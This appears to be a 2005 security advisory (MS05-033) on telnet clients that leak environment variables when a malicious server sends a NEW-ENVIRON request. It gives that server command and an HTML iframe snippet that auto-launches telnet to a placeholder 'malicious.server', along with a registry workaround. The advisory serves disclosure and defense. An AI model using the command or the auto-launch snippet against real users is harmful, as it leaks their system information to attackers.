Multiple Telnet Client Information Disclosure Vulnerabilities (MS05-033)
15 Jun. 2005
Summary
The TELNET protocol allows virtual network terminals to be connected to over the Internet. The initial description of the telnet protocol was given in RFC854 in May 1983. Since then there have been many extra features added including encryption.
Flaws in handling of the NEW-ENVIRON TELNET command in multiple telnet clients allows an attacker to gain sensitive information about the victim's system.
Remote exploitation of an input validation error in multiple telnet clients could allow an attacker to gain sensitive information about the victim's system.
The vulnerability specifically exists in the handling of the NEW-ENVIRON command.
In order to exploit this vulnerability, a malicious server can send a connected client the following telnet command: SB NEW-ENVIRON SEND ENV_USERVAR <name of environment variable> SE
Vulnerable telnet clients will send the contents of the reference environment variable, which may contain information useful to an attacker. The expected behavior would be only to send environment variables related directly to the operation of the telnet client (for example, TERM), or those specifically allowed by the user.
Successful exploitation of the vulnerability would allow an attacker to read the values of arbitrary environment variables. By itself this vulnerability is not a large threat, but exploiting this vulnerability may give an attacker more information about a targeted system, which could allow more effective attacks.
In order to exploit this vulnerability, an attacker would need to convince the user to connect to their malicious server. It may be possible to automatically launch the telnet command from a web page, for example: < html>< body>
< iframe src='telnet://malicious.server/'>
</body>
On opening this page the telnet client may be launched and attempt to connect to the host 'malicious.server'.
Workaround:
For Windows based platforms, disabling the Telnet handler or specifying a different application to handle Telnet URL's can mitigate URL based attacks. This can be accomplished by removing or modifying the following registry key: HKEY_CLASSES_ROOT\telnet\shell\open\command
This workaround should prevent automatic exploitation attempts. It does not fix the underlying issue.
